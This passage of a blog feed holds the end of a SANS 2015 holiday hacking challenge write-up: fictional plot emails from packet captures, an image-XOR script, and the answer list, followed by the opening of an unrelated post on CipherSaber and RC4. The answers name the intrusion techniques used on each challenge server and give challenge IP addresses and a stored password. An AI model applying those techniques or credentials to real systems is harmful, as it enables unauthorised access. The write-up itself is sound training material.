&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="part-5-baby-its-gnome-outside-sinister-plot-and-attribution"&gt;
&lt;h2&gt;&lt;a class="toc-backref" href="#id15"&gt;Part 5: Baby, It’s Gnome Outside: &lt;em&gt;Sinister Plot and Attribution&lt;/em&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;We can see on the SuperGnomes some capture files, inside ZIP archives. We can
also see from a conversation on the GnomeNET on the SuperGnomes that someone
has a problem with the pictures taken by the gnomes: if some gnomes have the
same name, the uploaded images get scrambled together (the RGB pixels are
XORed with one another):&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Welcome to GnomeNET.&lt;/p&gt;
&lt;p&gt;I noticed an issue when there are multiple child-gnomes with the same name.
The image feeds become scrambled together. Any way to resolve this other
than rename the gnomes?? ~DW&lt;/p&gt;
&lt;p&gt;Can you provide an example of the scrambling you're seeing? ~PS&lt;/p&gt;
&lt;p&gt;I uploaded 'camera_feed_overlap_error.png' to SG-01. We have six factory
test cameras all named the same. The issue occurs only when they have the
same name. It occurs even if the cameras are not transmitting an image. ~PS&lt;/p&gt;
&lt;p&gt;Oh, also, in the image, 5 of the cameras are just transmitting the 'camera
disabled' static, the 6th one was in the boss' office. The door was locked
and the boss seemed busy, so I didn't mess with that one. ~PS&lt;/p&gt;
&lt;p&gt;To help me troubleshoot this, can you grab a still from all six cameras at
the same time? Also, is this really an issue? ~DW&lt;/p&gt;
&lt;p&gt;I grabbed a still from 5 of the 6 cameras, again, staying out of the boss'
office! Each cam is directed to a different SG, so each SG has one of the
5 stills I manually snagged. I named them 'factory_cam_#.png' and pushed
them up to the files menu. 'camera_feed_overlap_error.png' has that garbled
image. Oh, and to answer your question. Yes. We have almost 2 million
cameras... some of them WILL be named the same. Just fix it. ~PS&lt;/p&gt;
&lt;p&gt;Took a look at your issue. It looks like the camera feed collector only
cares about the name and will merge the feeds. Looks like each pixel is
XORed... Its going to be a lot of work to fix this. We are too late in
the game to push a new update to all the cameras... stop naming cameras
the same name. ~DW&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;So we have six images: five from some gnomes and one from the boss' office.
By recovering the five images and XORing them with the sixth image, we can
see an image from the boss' office!&lt;/p&gt;
&lt;p&gt;By using the vulnerabilities from Part 4, we can recover the capture file
and the images.&lt;/p&gt;
&lt;p&gt;You can download the capture files here:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;a class="reference external" href="/docs/sans-christmas-challenge-2015/20141226101055_1.pcap"&gt;First capture file&lt;/a&gt;
(sha256: &lt;code&gt;a15a537562a4c828bf9eebd09f8f99686df76a4854a741a2df63902a023a1cea&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;&lt;a class="reference external" href="/docs/sans-christmas-challenge-2015/20150225093040_2.pcap"&gt;Second capture file&lt;/a&gt;
(sha256: &lt;code&gt;d4481450877d1468fba6c038f2a2c7b72eaab80540dda07fcc28b0a63045bd0c&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;&lt;a class="reference external" href="/docs/sans-christmas-challenge-2015/20151201113358_3.pcap"&gt;Third capture file&lt;/a&gt;
(sha256: &lt;code&gt;f12950e677cfa1646c1c616a62d063497cf0d2cc9cea3a0167ad302a02b682c8&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;&lt;a class="reference external" href="/docs/sans-christmas-challenge-2015/20151203133818_4.pcap"&gt;Fourth capture file&lt;/a&gt;
(sha256: &lt;code&gt;45f076467bdd69d4855d21726f398f246b7179e499fde663b4f6c7e77ba39025&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;&lt;a class="reference external" href="/docs/sans-christmas-challenge-2015/20151215161015_5.pcap"&gt;Fifth capture file&lt;/a&gt;
(sha256: &lt;code&gt;5a637e03e9a2ea4b4fde5437eabd281d2e78c6b383a31f0e705dd9da2ec6c12a&lt;/code&gt;)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;You can download the images here:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;a class="reference external" href="/images/sans-christmas-challenge-2015/factory_cam_1.png"&gt;First factory image&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference external" href="/images/sans-christmas-challenge-2015/factory_cam_2.png"&gt;Second factory image&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference external" href="/images/sans-christmas-challenge-2015/factory_cam_3.png"&gt;Third factory image&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference external" href="/images/sans-christmas-challenge-2015/factory_cam_4.png"&gt;Fourth factory image&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference external" href="/images/sans-christmas-challenge-2015/factory_cam_5.png"&gt;Fifth factory image&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference external" href="/images/sans-christmas-challenge-2015/camera_feed_overlap_error.png"&gt;Camera overlay image&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Let's look at the capture files first. By opening them with Wireshark,
we can see some SMTP and IMAP traffic.By using the wonderful
&amp;quot;Follow TCP Stream&amp;quot; functionnality, we can recover the full traffic.&lt;/p&gt;
&lt;div class="section" id="first-capture-file"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id16"&gt;First capture file&lt;/a&gt;&lt;/h3&gt;
&lt;pre class="literal-block"&gt;
From: &amp;quot;c&amp;quot; &amp;lt;c&amp;#64;atnascorp.com&amp;gt;
To: &amp;lt;jojo&amp;#64;atnascorp.com&amp;gt;
Subject: GiYH Architecture
Date: Fri, 26 Dec 2014 10:10:55 -0500

JoJo,

As you know, I hired you because you are the best architect in town for a
distributed surveillance system to satisfy our rather unique business
requirements.  We have less than a year from today to get our final plans in
place.  Our schedule is aggressive, but realistic.

I've sketched out the overall Gnome in Your Home architecture in the diagram
attached below.  Please add in protocol details and other technical
specifications to complete the architectural plans.

Remember: to achieve our goal, we must have the infrastructure scale to
upwards of 2 million Gnomes.  Once we solidify the architecture, you'll work
with the hardware team to create device specs and we'll start procuring
hardware in the February 2015 timeframe.

I've also made significant progress on distribution deals with retailers.

Thoughts?

Looking forward to working with you on this project!

-C
&lt;/pre&gt;
&lt;p&gt;Attached to this email is this image:&lt;/p&gt;
&lt;img alt="giyh_architecture.jpg" class="align-center" src="/images/sans-christmas-challenge-2015/giyh_architecture.jpg" /&gt;
&lt;/div&gt;
&lt;div class="section" id="second-capture-file"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id17"&gt;Second capture file&lt;/a&gt;&lt;/h3&gt;
&lt;pre class="literal-block"&gt;
From: &amp;quot;c&amp;quot; &amp;lt;c&amp;#64;atnascorp.com&amp;gt;
To: &amp;lt;supplier&amp;#64;ginormouselectronicssupplier.com&amp;gt;
Subject: Large Order - Immediate Attention Required
Date: Wed, 25 Feb 2015 09:30:39 -0500

Maratha,

As a follow-up to our phone conversation, we'd like to proceed with an order
of parts for our upcoming product line.  We'll need two million of each of
the following components:

* Ambarella S2Lm IP Camera Processor System-on-Chip (with an ARM Cortex A9
  CPU and Linux SDK)
* ON Semiconductor AR0330: 3 MP 1/3&amp;quot; CMOS Digital Image Sensor
* Atheros AR6233X Wi-Fi adapter
* Texas Instruments TPS65053 switching power supply
* Samsung K4B2G16460 2GB SSDR3 SDRAM
* Samsung K9F1G08U0D 1GB NAND Flash

Given the volume of this purchase, we fully expect the 35% discount you
mentioned during our phone discussion.  If you cannot agree to this pricing,
we'll place our order elsewhere.

We need delivery of components to begin no later than April 1, 2015, with
250,000 units coming each week, with all of them arriving no later than June
1, 2015.


Finally, as you know, this project requires the utmost secrecy.   Tell NO
ONE about our order, especially any nosy law enforcement authorities.

Regards,

-CW
&lt;/pre&gt;
&lt;/div&gt;
&lt;div class="section" id="third-capture-file"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id18"&gt;Third capture file&lt;/a&gt;&lt;/h3&gt;
&lt;pre class="literal-block"&gt;
From: &amp;quot;c&amp;quot; &amp;lt;c&amp;#64;atnascorp.com&amp;gt;
To: &amp;lt;burglerlackeys&amp;#64;atnascorp.com&amp;gt;
Subject: All Systems Go for Dec 24, 2015
Date: Tue, 1 Dec 2015 11:33:56 -0500

My Burgling Friends,

Our long-running plan is nearly complete, and I'm writing to share the date
when your thieving will commence!  On the morning of December 24, 2015, each
individual burglar on this email list will receive a detailed itinerary of
specific houses and an inventory of items to steal from each house, along
with still photos of where to locate each item.  The message will also
include a specific path optimized for you to hit your assigned houses
quickly and efficiently the night of December 24, 2015 after dark.

Further, we've selected the items to steal based on a detailed analysis of
what commands the highest prices on the hot-items open market.  I caution
you - steal only the items included on the list.  DO NOT waste time grabbing
anything else from a house.  There's no sense whatsoever grabbing crumbs too
small for a mouse!

As to the details of the plan, remember to wear the Santa suit we provided
you, and bring the extra large bag for all your stolen goods.

If any children observe you in their houses that night, remember to tell
them that you are actually &amp;quot;Santy Claus&amp;quot;, and that you need to send the
specific items you are taking to your workshop for repair.  Describe it in a
very friendly manner, get the child a drink of water, pat him or her on the
head, and send the little moppet back to bed.  Then, finish the deed, and
get out of there.  It's all quite simple - go to each house, grab the loot,
and return it to the designated drop-off area so we can resell it.  And,
above all, avoid Mount Crumpit!

As we agreed, we'll split the proceeds from our sale 50-50 with each
burglar.

Oh, and I've heard that many of you are asking where the name ATNAS comes
from.  Why, it's reverse SANTA, of course.  Instead of bringing presents on
Christmas, we'll be stealing them!

Thank you for your partnership in this endeavor.

Signed:

-CLW

President and CEO of ATNAS Corporation
&lt;/pre&gt;
&lt;/div&gt;
&lt;div class="section" id="fourth-capture-file"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id19"&gt;Fourth capture file&lt;/a&gt;&lt;/h3&gt;
&lt;pre class="literal-block"&gt;
From: &amp;quot;c&amp;quot; &amp;lt;c&amp;#64;atnascorp.com&amp;gt;
To: &amp;lt;psychdoctor&amp;#64;whovillepsychiatrists.com&amp;gt;
Subject: Answer To Your Question
Date: Thu, 3 Dec 2015 13:38:15 -0500

Dr. O'Malley,

In your recent email, you inquired:

&amp;gt; When did you first notice your anxiety about the holiday season?

Anxiety is hardly the word for it.  It's a deep-seated hatred, Doctor.

Before I get into details, please allow me to remind you that we operate
under the strictest doctor-patient confidentiality agreement in the
business.  I have some very powerful lawyers whom I'd hate to invoke in the
event of some leak on your part.  I seek your help because you are the best
psychiatrist in all of Who-ville.

To answer your question directly, as a young child (I must have been no more
than two), I experienced a life-changing interaction.  Very late on
Christmas Eve, I was awakened to find a grotesque green Who dressed in a
tattered Santa Claus outfit, standing in my barren living room, attempting
to shove our holiday tree up the chimney.  My senses heightened, I put on my
best little-girl innocent voice and asked him what he was doing.  He
explained that he was &amp;quot;Santy Claus&amp;quot; and needed to send the tree for repair.
I instantly knew it was a lie, but I humored the old thief so I could escape
to the safety of my bed.  That horrifying interaction ruined Christmas for
me that year, and I was terrified of the whole holiday season throughout my
teen years.

I later learned that the green Who was known as &amp;quot;the Grinch&amp;quot; and had lost
his mind in the middle of a crime spree to steal Christmas presents.  At the
very moment of his criminal triumph, he had a pitiful change of heart and
started playing all nicey-nice.  What an amateur!  When I became an adult,
my fear of Christmas boiled into true hatred of the whole holiday season.  I
knew that I had to stop Christmas from coming.  But how?

I vowed to finish what the Grinch had started, but to do it at a far larger
scale.  Using the latest technology and a distributed channel of burglars,
we'd rob 2 million houses, grabbing their most precious gifts, and selling
them on the open market.  We'll destroy Christmas as two million homes full
of people all cry &amp;quot;BOO-HOO&amp;quot;, and we'll turn a handy profit on the whole
deal.

Is this &amp;quot;wrong&amp;quot;?  I simply don't care.  I bear the bitter scars of the
Grinch's malfeasance, and singing a little &amp;quot;Fahoo Fores&amp;quot; isn't gonna fix
that!

What is your advice, doctor?

Signed,

Cindy Lou Who
&lt;/pre&gt;
&lt;/div&gt;
&lt;div class="section" id="fifth-capture-file"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id20"&gt;Fifth capture file&lt;/a&gt;&lt;/h3&gt;
&lt;pre class="literal-block"&gt;
From: &amp;quot;Grinch&amp;quot; &amp;lt;grinch&amp;#64;who-villeisp.com&amp;gt;
To: &amp;lt;c&amp;#64;atnascorp.com&amp;gt;
Subject: My Apologies &amp;amp; Holiday Greetings
Date: Tue, 15 Dec 2015 16:09:40 -0500

Dear Cindy Lou,

I am writing to apologize for what I did to you so long ago.  I wronged you
and all the Whos down in Who-ville due to my extreme misunderstanding of
Christmas and a deep-seated hatred.  I should have never lied to you, and I
should have never stolen those gifts on Christmas Eve.  I realize that even
returning them on Christmas morn didn't erase my crimes completely.  I seek
your forgiveness.

You see, on Mount Crumpit that fateful Christmas morning, I learned th[4 bytes missing in capture file]at
Christmas doesn't come from a store.  In fact, I discovered that Christmas
means a whole lot more!

When I returned their gifts, the Whos embraced me.  They forgave.  I was
stunned, and my heart grew even more.  Why, they even let me carve the roast
beast!  They demonstrated to me that the holiday season is, in part, about
forgiveness and love, and that's the gift that all the Whos gave to me that
morning so long ago.  I honestly tear up thinking about it.

I don't expect you to forgive me, Cindy Lou.  But, you have my deepest and
most sincere apologies.

And, above all, don't let my horrible actions from so long ago taint you in
any way.  I understand you've grown into an amazing business leader.  You
are a precious and beautiful Who, my dear.  Please use your skills wisely
and to help and support your fellow Who, especially during the holidays.

I sincerely wish you a holiday season full of kindness and warmth,

--The Grinch
&lt;/pre&gt;
&lt;/div&gt;
&lt;div class="section" id="let-s-unxor-the-images"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id21"&gt;Let's unXOR the images&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;With a simple Python script, we can take every image and XOR the RGB pixels
to recover the image from the boss' office:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="ch"&gt;#!/usr/bin/env python&lt;/span&gt;

&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="nn"&gt;sys&lt;/span&gt;
&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="nn"&gt;PIL&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;Image&lt;/span&gt;

&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;main&lt;/span&gt;&lt;span class="p"&gt;():&lt;/span&gt;
    &lt;span class="c1"&gt;# We open the camera feed overlap image&lt;/span&gt;
    &lt;span class="n"&gt;scrambled_image&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;Image&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;open&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;sys&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;6&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;convert&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;RGB&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="n"&gt;scrambled_image_pixels&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;scrambled_image&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;load&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
    &lt;span class="n"&gt;width&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;height&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;scrambled_image&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;size&lt;/span&gt;

    &lt;span class="c1"&gt;# For every image found in one of the SuperGnomes&lt;/span&gt;
    &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;image&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;sys&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="mi"&gt;6&lt;/span&gt;&lt;span class="p"&gt;]:&lt;/span&gt;
        &lt;span class="n"&gt;image_pixels&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;Image&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;open&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;image&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;convert&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;RGB&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;load&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
        &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="nb"&gt;xrange&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;width&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
            &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;j&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="nb"&gt;xrange&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;height&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
                &lt;span class="c1"&gt;# We take the RGB components&lt;/span&gt;
                &lt;span class="n"&gt;r1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;g1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;b1&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;scrambled_image_pixels&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;j&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
                &lt;span class="n"&gt;r2&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;g2&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;b2&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;image_pixels&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;j&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
                &lt;span class="c1"&gt;# And we XOR them to recover the original value&lt;/span&gt;
                &lt;span class="n"&gt;scrambled_image_pixels&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;j&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;r1&lt;/span&gt; &lt;span class="o"&gt;^&lt;/span&gt; &lt;span class="n"&gt;r2&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;g1&lt;/span&gt; &lt;span class="o"&gt;^&lt;/span&gt; &lt;span class="n"&gt;g2&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;b1&lt;/span&gt; &lt;span class="o"&gt;^&lt;/span&gt; &lt;span class="n"&gt;b2&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="c1"&gt;# We save the result in a new image&lt;/span&gt;
    &lt;span class="n"&gt;scrambled_image&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;save&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;result.png&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;PNG&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;

&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="vm"&gt;__name__&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;__main__&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="n"&gt;main&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Then, we just have to run this script:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; ./unxor_images.py sg01/factory_cam_1.png sg02/factory_cam_2.png sg03/factory_cam_3.png &lt;span class="se"&gt;\&lt;/span&gt;
    sg04/factory_cam_4.png sg05/factory_cam_5.png camera_feed_overlap_error.png
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;This gives us the resulting image:&lt;/p&gt;
&lt;img alt="sans_xor_image_result.png" class="align-center" src="/images/sans-christmas-challenge-2015/sans_xor_image_result.png" /&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="epilogue-twas-the-gnome-before-christmas-wrapping-it-all-up"&gt;
&lt;h2&gt;&lt;a class="toc-backref" href="#id22"&gt;Epilogue: ‘Twas the Gnome Before Christmas: &lt;em&gt;Wrapping It All Up&lt;/em&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;As in every SANS Christmas Challenge, we have to answer several
questions:&lt;/p&gt;
&lt;ol class="arabic simple"&gt;
&lt;li&gt;Which commands are sent across the Gnome’s command-and-control
channel?&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The command sent to the command-and-control server are &lt;code&gt;iwconfig&lt;/code&gt; and
&lt;code&gt;cat /tmp/iwlistscan.txt&lt;/code&gt;.&lt;/p&gt;
&lt;ol class="arabic simple" start="2"&gt;
&lt;li&gt;What image appears in the photo the Gnome sent across the
channel from the Dosis home?&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;We can see a picture of Josh's bedroom.&lt;/p&gt;
&lt;ol class="arabic simple" start="3"&gt;
&lt;li&gt;What operating system and CPU type are used in the Gnome?
What type of web framework is the Gnome web interface built in?&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The Gnome is running OpenWRT in the development branch.
Its CPU architecture is 32-bit ARM. The web interface is built
with NodeJS, with Jade Node as the template engine.&lt;/p&gt;
&lt;ol class="arabic simple" start="4"&gt;
&lt;li&gt;What kind of a database engine is used to support the Gnome web
interface? What is the plaintext password stored in the Gnome database?&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The database engine is MongoDB. The plaintex password is
&lt;code&gt;SittingOnAShelf&lt;/code&gt;.&lt;/p&gt;
&lt;ol class="arabic simple" start="5"&gt;
&lt;li&gt;What are the IP addresses of the five SuperGnomes scattered around the
world, as verified by Tom Hessman in the Dosis neighborhood?&lt;/li&gt;
&lt;li&gt;Where is each SuperGnome located geographically?&lt;/li&gt;
&lt;/ol&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;SuperGnome01: 52.2.229.189, located in United States, Ashburn (VI)&lt;/li&gt;
&lt;li&gt;SuperGnome02: 52.34.3.80, located in United States, Portland (OR)&lt;/li&gt;
&lt;li&gt;SuperGnome03: 52.64.191.71, located in Australia, Sydney&lt;/li&gt;
&lt;li&gt;SuperGnome04: 52.192.152.132, located in Japan, Tokyo&lt;/li&gt;
&lt;li&gt;SuperGnome05: 54.233.105.81, located in Brazil, Sao Paulo&lt;/li&gt;
&lt;/ul&gt;
&lt;ol class="arabic simple" start="7"&gt;
&lt;li&gt;Please describe the vulnerabilities you discovered in the
Gnome firmware.&lt;/li&gt;
&lt;li&gt;Describe the technique you used to gain access to each SuperGnome’s
gnome.conf file.&lt;/li&gt;
&lt;/ol&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;SuperGnome01: Credentials stored in plaintext. Reuse of credentials.&lt;/li&gt;
&lt;li&gt;SuperGnome02: Arbitrary folder creation. Local file inclusion.&lt;/li&gt;
&lt;li&gt;SuperGnome03: NoSQL injection&lt;/li&gt;
&lt;li&gt;SuperGnome04: Server Side JavaScript injection&lt;/li&gt;
&lt;li&gt;SuperGnome05: Buffer-overflow&lt;/li&gt;
&lt;/ul&gt;
&lt;ol class="arabic simple" start="9"&gt;
&lt;li&gt;Based on evidence you recover from the SuperGnomes’ packet capture ZIP
files and any staticky images you find, what is the nefarious plot of
ATNAS Corporation?&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The plot of the ATNAS Corporation is to sell millions of Gnomes to families,
so that they can identify valuable objects, and then come and steal it during
Christmas night, by disguising themselves as Santy Claus.&lt;/p&gt;
&lt;ol class="arabic simple" start="10"&gt;
&lt;li&gt;Who is the villain behind the nefarious plot?&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The villain is none other that
&lt;a class="reference external" href="http://seuss.wikia.com/wiki/Cindy_Lou_Who"&gt;Cindy Lou Who&lt;/a&gt;. After being
traumatised by the Grinch stealing Christmas, she has developped a deep
hatred for this holiday.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="conclusion"&gt;
&lt;h2&gt;&lt;a class="toc-backref" href="#id23"&gt;Conclusion&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;I really enjoyed doing this challenge, because it allowed me to develop
my skills in technologies I'm not familiar with, such as NoSQL database
engines, or buffer-overflow (something I should really work on).&lt;/p&gt;
&lt;p&gt;Many thanks to the SANS institute for this incredible Christmas Challenge!&lt;/p&gt;
&lt;/div&gt;
</content></entry><entry><title>May the Cipher be with you</title><link href="https://allyourbase.utouch.fr/posts/2013/02/03/may-the-cipher-be-with-you/" rel="alternate"></link><published>2013-02-03T01:42:00+01:00</published><updated>2013-02-03T01:42:00+01:00</updated><author><name>useless</name></author><id>tag:allyourbase.utouch.fr,2013-02-03:/posts/2013/02/03/may-the-cipher-be-with-you/</id><summary type="html">&lt;img alt="ciphersaber-logo.png" class="align-center" src="/images/may-the-cipher-be-with-you/ciphersaber-logo.png" /&gt;
&lt;p&gt;NB: I know that implementing cryptographic algorithms yourself is
dangerous. There are many implementation problems people won't think
about, like memory management. I just wanted to talk about the
CipherSaber because I think it's an old, yet neat project. I think it's
important to sensitize people about cryptography and the …&lt;/p&gt;</summary><content type="html">&lt;img alt="ciphersaber-logo.png" class="align-center" src="/images/may-the-cipher-be-with-you/ciphersaber-logo.png" /&gt;
&lt;p&gt;NB: I know that implementing cryptographic algorithms yourself is
dangerous. There are many implementation problems people won't think
about, like memory management. I just wanted to talk about the
CipherSaber because I think it's an old, yet neat project. I think it's
important to sensitize people about cryptography and the regulations
around its usage. &lt;strong&gt;If you want to use cryptography to protect your
privacy, I suggest you look at a more serious project like PGP.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;A few months ago, while checking my RSS feeds, I saw &lt;a class="reference external" href="http://www.reddit.com/r/netsec/comments/10d7zb/are_there_any_inprogress_opensource_cryptography/"&gt;this discussion&lt;/a&gt;
on Reddit. Since I love cryptography and FLOSS, I looked at the comment
section, to see what kind of answers were posted.&lt;/p&gt;
&lt;p&gt;One comment caught my attention:&lt;/p&gt;
&lt;img alt="ciphersaber-comment.png" class="align-center" src="/images/may-the-cipher-be-with-you/ciphersaber-comment.png" /&gt;
&lt;p&gt;What intrigued me was the idea of creating your own &amp;quot;something&amp;quot; (plus,
the &amp;quot;something&amp;quot; had a really cool name), and I also like the fact that I
could start right away.&lt;/p&gt;
&lt;p&gt;So, I went to the &lt;a class="reference external" href="http://ciphersaber.gurus.org/"&gt;CipherSaber&lt;/a&gt; web
page, to see what's what. And, being the privacy advocate that I am, I
was not disappointed. The CipherSaber is a form of protest against US
ban on cryptography.&lt;/p&gt;
&lt;p&gt;It was written after 9/11, when the US government wanted to limit the
use/publication of cryptography, in order to prevent the terrorists from
using it. It's, of course, a ridiculous idea, since the crypto is
&lt;em&gt;already&lt;/em&gt; out there, and anybody can use it, even the terrorists: it's
a little too late to try to prevent cryptography export. Plus, as stated
in the CipherSaber web page, nothing would prevent terrorists to send
some of their members to US universities to learn cryptography, as they
do to learn chemistry, nuclear engineering etc.&lt;/p&gt;
&lt;p&gt;As my good friend (okay, we've never met, but still, he has a point)
Philip Zimmermann said:&lt;/p&gt;
&lt;blockquote&gt;
If privacy is outlawed, only outlaws will have privacy.&lt;/blockquote&gt;
&lt;p&gt;The idea behind the CipherSaber, is to have everyone implementing a
strong crypto algorithm, so that people don't rely on products that can
be banned. The chosen algorithm is the stream cipher RC4, because it's
strong, and easy to implement (see CipherSaber-2 in the web page to
correct a known vulnerability in RC4). The name CipherSaber comes from
